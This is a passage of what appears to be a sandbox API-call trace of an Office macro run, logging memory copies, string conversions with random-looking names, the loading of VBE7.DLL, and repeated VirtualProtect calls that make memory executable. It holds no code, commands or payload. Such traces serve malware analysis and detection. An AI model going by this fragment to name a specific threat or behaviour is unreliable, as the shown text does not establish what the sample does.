_Dst=0xaf5170, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.465] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.465] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.465] memcpy (in: _Dst=0xaf5170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.466] memcpy (in: _Dst=0xaf5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0103.466] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.466] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.466] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.466] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dacac, cbMultiByte=7, lpWideCharStr=0x9ec16e4, cchWideChar=16 | out: lpWideCharStr="VUoIvPv") returned 7 [0103.467] memcpy (in: _Dst=0xcaa8b34, _Src=0x9ec16e0, _Size=0x14 | out: _Dst=0xcaa8b34) returned 0xcaa8b34 [0103.467] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.467] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.467] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.467] memcpy (in: _Dst=0xaf516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.467] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10882, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0103.467] wcscpy_s (in: _Destination=0xf5ffbcc, _SizeInWords=0x7, _Source="Remove" | out: _Destination="Remove") returned 0x0 [0103.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2daccc, cbMultiByte=12, lpWideCharStr=0x9ec2254, cchWideChar=26 | out: lpWideCharStr="vEm9AMQvDKV7") returned 12 [0103.468] CRetailMalloc_Alloc () returned 0x88f1e90 [0103.468] memcpy (in: _Dst=0x88f1ea4, _Src=0x9ec2250, _Size=0x1e | out: _Dst=0x88f1ea4) returned 0x88f1ea4 [0103.468] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.468] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.468] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.468] memcpy (in: _Dst=0xaf516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.468] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10882, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0103.469] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.469] memcpy (in: _Dst=0xaf516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.469] CRetailMalloc_Alloc () returned 0xb28de90 [0103.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0103.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0103.474] memcpy (in: _Dst=0xcad016c, _Src=0x197ac4, _Size=0x18 | out: _Dst=0xcad016c) returned 0xcad016c [0103.474] CRetailMalloc_Realloc () returned 0xcacff00 [0103.474] CRetailMalloc_Free () returned 0x1 [0103.474] GetCurrentProcess () returned 0xffffffff [0103.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.474] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.475] GetCurrentProcess () returned 0xffffffff [0103.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.475] GetCurrentProcess () returned 0xffffffff [0103.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.475] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.476] GetCurrentProcess () returned 0xffffffff [0103.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.476] GetCurrentProcess () returned 0xffffffff [0103.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.476] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.476] GetCurrentProcess () returned 0xffffffff [0103.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.476] GetCurrentProcess () returned 0xffffffff [0103.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.476] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.477] GetCurrentProcess () returned 0xffffffff [0103.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.477] GetCurrentProcess () returned 0xffffffff [0103.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.477] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.478] GetCurrentProcess () returned 0xffffffff [0103.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.478] GetCurrentProcess () returned 0xffffffff [0103.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.478] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.478] GetCurrentProcess () returned 0xffffffff [0103.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.478] GetCurrentProcess () returned 0xffffffff [0103.478] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.478] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.500] GetCurrentProcess () returned 0xffffffff [0103.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.501] GetCurrentProcess () returned 0xffffffff [0103.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.501] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.502] GetCurrentProcess () returned 0xffffffff [0103.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.502] GetCurrentProcess () returned 0xffffffff [0103.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.502] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.502] GetCurrentProcess () returned 0xffffffff [0103.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.502] GetCurrentProcess () returned 0xffffffff [0103.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.502] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.503] GetCurrentProcess () returned 0xffffffff [0103.503] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.503] GetCurrentProcess () returned 0xffffffff [0103.503] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.503] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.504] GetCurrentProcess () returned 0xffffffff [0103.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.504] GetCurrentProcess () returned 0xffffffff [0103.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.504] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.504] GetCurrentProcess () returned 0xffffffff [0103.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.504] GetCurrentProcess () returned 0xffffffff [0103.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.504] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.505] GetCurrentProcess () returned 0xffffffff [0103.505] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.505] GetCurrentProcess () returned 0xffffffff [0103.505] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.505] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.506] GetCurrentProcess () returned 0xffffffff [0103.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.506] GetCurrentProcess () returned 0xffffffff [0103.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.506] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.506] GetCurrentProcess () returned 0xffffffff [0103.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.506] GetCurrentProcess () returned 0xffffffff [0103.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.506] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.507] GetCurrentProcess () returned 0xffffffff [0103.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.507] GetCurrentProcess () returned 0xffffffff [0103.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.507] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.508] GetCurrentProcess () returned 0xffffffff [0103.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.508] GetCurrentProcess () returned 0xffffffff [0103.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.508] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.508] GetCurrentProcess () returned 0xffffffff [0103.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.508] GetCurrentProcess () returned 0xffffffff [0103.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.508] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.509] GetCurrentProcess () returned 0xffffffff [0103.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.509] GetCurrentProcess () returned 0xffffffff [0103.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.509] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.510] GetCurrentProcess () returned 0xffffffff [0103.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.510] GetCurrentProcess () returned 0xffffffff [0103.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.510] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.537] GetCurrentProcess () returned 0xffffffff [0103.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.537] GetCurrentProcess () returned 0xffffffff [0103.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.537] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.538] GetCurrentProcess () returned 0xffffffff [0103.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.538] GetCurrentProcess () returned 0xffffffff [0103.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.538] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.538] GetCurrentProcess () returned 0xffffffff [0103.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.538] GetCurrentProcess () returned 0xffffffff [0103.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.538] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.539] GetCurrentProcess () returned 0xffffffff [0103.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.539] GetCurrentProcess () returned 0xffffffff [0103.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.539] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.540] GetCurrentProcess () returned 0xffffffff [0103.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.540] GetCurrentProcess () returned 0xffffffff [0103.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.540] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.540] GetCurrentProcess () returned 0xffffffff [0103.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.540] GetCurrentProcess () returned 0xffffffff [0103.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.540] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.541] GetCurrentProcess () returned 0xffffffff [0103.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.541] GetCurrentProcess () returned 0xffffffff [0103.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.541] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.542] GetCurrentProcess () returned 0xffffffff [0103.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.542] GetCurrentProcess () returned 0xffffffff [0103.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.542] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.542] GetCurrentProcess () returned 0xffffffff [0103.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.543] GetCurrentProcess () returned 0xffffffff [0103.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.543] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.543] GetCurrentProcess () returned 0xffffffff [0103.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.543] GetCurrentProcess () returned 0xffffffff [0103.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.543] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0103.544] GetCurrentProcess () returned 0xffffffff [0103.544] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.544] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.545] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0103.545] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0103.546] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.546] GetProcAddress (hModule=0x681f0000, lpProcName=0x284) returned 0x68225c5c [0103.546] GetCurrentProcess () returned 0xffffffff [0103.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa851c, dwSize=0x19) returned 1 [0103.546] VirtualProtect (in: lpAddress=0xcaa851c, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0103.547] GetCurrentProcess () returned 0xffffffff [0103.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa7330, dwSize=0x19) returned 1 [0103.547] VirtualProtect (in: lpAddress=0xcaa7330, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0103.548] GetCurrentProcess () returned 0xffffffff [0103.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa857c, dwSize=0x19) returned 1 [0103.548] VirtualProtect (in: lpAddress=0xcaa857c, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0103.549] GetAsyncKeyState (vKey=3) returned 0 [0103.549] CRetailMalloc_Alloc () returned 0xcad01e0 [0103.549] memcpy (in: _Dst=0xaf5168, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.549] memcpy (in: _Dst=0xcad0200, _Src=0x197944, _Size=0x18 | out: _Dst=0xcad0200) returned 0xcad0200 [0103.549] CRetailMalloc_Realloc () returned 0xcad01e0 [0103.549] CRetailMalloc_Free () returned 0x1 [0103.550] GetCurrentProcess () returned 0xffffffff [0103.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.550] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.550] GetCurrentProcess () returned 0xffffffff [0103.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.550] GetCurrentProcess () returned 0xffffffff [0103.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.550] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.551] GetCurrentProcess () returned 0xffffffff [0103.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.551] GetCurrentProcess () returned 0xffffffff [0103.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.551] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.552] GetCurrentProcess () returned 0xffffffff [0103.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.552] GetCurrentProcess () returned 0xffffffff [0103.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.552] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.552] GetCurrentProcess () returned 0xffffffff [0103.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.552] GetCurrentProcess () returned 0xffffffff [0103.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.552] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.553] GetCurrentProcess () returned 0xffffffff [0103.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.553] GetCurrentProcess () returned 0xffffffff [0103.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.553] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.554] GetCurrentProcess () returned 0xffffffff [0103.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.554] GetCurrentProcess () returned 0xffffffff [0103.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.554] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.554] GetCurrentProcess () returned 0xffffffff [0103.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.554] GetCurrentProcess () returned 0xffffffff [0103.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.554] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.555] GetCurrentProcess () returned 0xffffffff [0103.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.555] GetCurrentProcess () returned 0xffffffff [0103.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.555] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.555] GetCurrentProcess () returned 0xffffffff [0103.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.556] GetCurrentProcess () returned 0xffffffff [0103.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.556] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.556] GetCurrentProcess () returned 0xffffffff [0103.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.556] GetCurrentProcess () returned 0xffffffff [0103.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.556] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.557] GetCurrentProcess () returned 0xffffffff [0103.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.557] GetCurrentProcess () returned 0xffffffff [0103.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.557] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.558] GetCurrentProcess () returned 0xffffffff [0103.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.558] GetCurrentProcess () returned 0xffffffff [0103.558] FlushInstructionCache (hProcess=0xffffffff, 